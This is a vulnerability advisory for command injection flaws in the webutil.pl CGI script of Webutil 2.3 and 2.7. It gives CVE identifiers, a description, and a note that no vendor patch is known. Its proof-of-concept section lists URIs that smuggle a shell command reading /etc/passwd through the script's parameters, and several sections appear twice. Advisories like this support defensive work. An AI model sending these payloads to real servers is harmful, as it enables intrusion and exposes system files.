Webutil 'webutil.pl' Multiple Remote Command Execution Vulnerabilities
BID:28393
Info
Webutil 'webutil.pl' Multiple Remote Command Execution Vulnerabilities
| Bugtraq ID: | 28393 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-6556 CVE-2008-6557 CVE-2008-6555 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 21 2008 12:00AM |
| Updated: | Jul 06 2016 02:17PM |
| Credit: | Zero X |
| Vulnerable: |
The Puppet Master Webutil 2.7 The Puppet Master Webutil 2.3 |
| Not Vulnerable: | |
Discussion
Webutil 'webutil.pl' Multiple Remote Command Execution Vulnerabilities
Webutil is prone to multiple vulnerabilities that attackers can leverage to execute arbitrary commands. These issues occur because the application fails to adequately sanitize user-supplied input.
Successful attacks can compromise the affected application and possibly the underlying computer.
These issues affect Webutil 2.3 and 2.7.
Webutil is prone to multiple vulnerabilities that attackers can leverage to execute arbitrary commands. These issues occur because the application fails to adequately sanitize user-supplied input.
Successful attacks can compromise the affected application and possibly the underlying computer.
These issues affect Webutil 2.3 and 2.7.
Exploit / POC
Webutil 'webutil.pl' Multiple Remote Command Execution Vulnerabilities
The following proof-of-concept URIs are available:
http://www.example.com/cgi-bin/webutil.pl?details&|cat$IFS/etc/passwd
http://www.example.com/cgi-bin/webutil.pl?dig&|cat$IFS/etc/passwd
http://www.example.com/cgi-bin/webutil.pl?whois&|cat$IFS/etc/passwd
The following proof-of-concept URIs are available:
http://www.example.com/cgi-bin/webutil.pl?details&|cat$IFS/etc/passwd
http://www.example.com/cgi-bin/webutil.pl?dig&|cat$IFS/etc/passwd
http://www.example.com/cgi-bin/webutil.pl?whois&|cat$IFS/etc/passwd
Solution / Fix
Webutil 'webutil.pl' Multiple Remote Command Execution Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Webutil 'webutil.pl' Multiple Remote Command Execution Vulnerabilities
References:
References:
- WebUtil Homepae (The Puppet Master)
- webutil.pl is still vulnerable against Remote Command Execution. ([email protected])